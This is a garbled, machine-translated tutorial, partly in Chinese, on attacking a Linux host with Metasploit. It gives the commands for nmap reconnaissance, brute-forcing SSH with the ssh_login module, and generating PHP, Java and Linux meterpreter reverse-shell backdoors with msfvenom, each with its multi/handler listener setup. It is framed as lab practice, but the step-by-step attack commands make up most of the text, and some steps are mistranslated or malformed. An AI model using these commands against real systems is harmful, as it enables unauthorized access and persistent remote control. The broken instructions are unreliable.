Metasploit penetration backdoor Linux systems and cross-platform backdoor generation
1.Metasploit blasting the target host SSH
1.1 blasting process
2.PHP backdoor generate
3.JAVA backdoor generate
4.LINUX backdoor generate
reference documentation
1.Metasploit on the target host SSH blasting
1. Principle: drone root user exists loopholes weak passwords, using the enumeration method to crack the target host ssh service
1.1 blasting process
1. Verify that the Internal LAN survival Host: nmap -sP 192.168.73.0/24
; drones get IP
2. Scan drone Operating Systems: nmap -O 192.168.73.128
; get drones operating system and version number
Open ports and applications 3. Scan drone version number: nmap -sV -Pn 192.168.73.128
; 22 ports found open, its application is ssh
4. Open the Metasploit tool, use msf ssh_login module drone ssh brute force password: use auxiliary/scanner/ssh/ssh_login
; enter module show options
configuration
5. Set up a user name and password dictionary Dictionary (To reduce the blasting time, user name and password to set a specific number)
- The user.txt and pass.txt files into the directory specified under kali linux
6. ssh ready to burst: Set the path to the user name and password dictionary dictionary; setting drone IP address; set thread 50; start execution
- After exploit, not shown; the VERBOSE set
true
to
7. Wait ssh blasting is finished
2.PHP backdoor generation
1. The example instructions:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php
2.配置Metasploit
,exploit
监听
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
- php后门使用
3.JAVA后门生成
1.示例指令
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar
2.配置Metasploit
,exploit
监听
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
- java后门使用
4.LINUX后门生成
1.示例指令:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
2.配置Metasploit
,exploit
监听
search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听
- linux后门使用
参考文档
- https://blog.csdn.net/Tahir_111/article/details/82389570
- https://bbs.ichunqiu.com/thread-20137-1-1.html
- Metasploit后门渗透Linux系统以及跨平台后门生成.md
2019-08-28 14:27:50 星期三
<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">